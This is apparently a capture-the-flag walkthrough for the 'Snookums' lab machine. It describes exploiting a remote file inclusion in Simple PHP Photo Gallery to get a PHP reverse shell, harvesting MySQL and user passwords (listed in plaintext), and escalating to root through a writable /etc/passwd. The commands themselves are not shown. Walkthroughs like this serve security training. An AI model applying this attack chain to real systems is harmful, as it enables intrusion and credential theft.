Snookums
Last updated
Last updated
Port 80 directs us to index.php for Simple PHP Photo Gallery. As we can see at the footer of the page we are on v08.
Running dirsearch.py against the target website produces the following found directories:
Of the directories, none are of particular interest so far after manual inspection. Searching on Google for exploits we do have a public exploit for RFI on v0.7.
As per the exploit page, the PoC for this is:
Browsing to image.php shows the following:
From here we can test RFI by starting an Python SimpleHTTPServer on our attacking machine and trying to browse to a test.txt file which contains the contents 'hello'.
As this has worked for us and we know the target is running PHP we can attempt a PHP reverse shell. I set a PHP Reverse shell to listen in on port 21 then browsed to it at:
Which resulted in a shell.
Browsing /var/www/html shows a db.php file. Reading the contents of this provides us with log in information for MySQL.
Once logged into MySQL locally we can see a database called 'SimplePHPGal'. Selecting the database and showing the tables reveals the 'users' tables. Selecting all columns from this provides us with some usernames and base64 values.
These values need to be decoded twice to view the plaintext value:
josh
MobilizeHissSeedtime747
michael
HockSydneyCertify123
serena
OverallCrestLean000
Viewing the contents of /etc/passwd shows two outstanding users, michael and GitRekt.
We can then attempt to SSH in as Michael with the potential credentials.
Linpeas reports the /etc/passwd file is writeable by us.
Knowing this we can setup a new root user to be created.
Generate password on attacking machine:
Echo the password and new user to the end of /etc/passwd on the target machine.
su to new user:
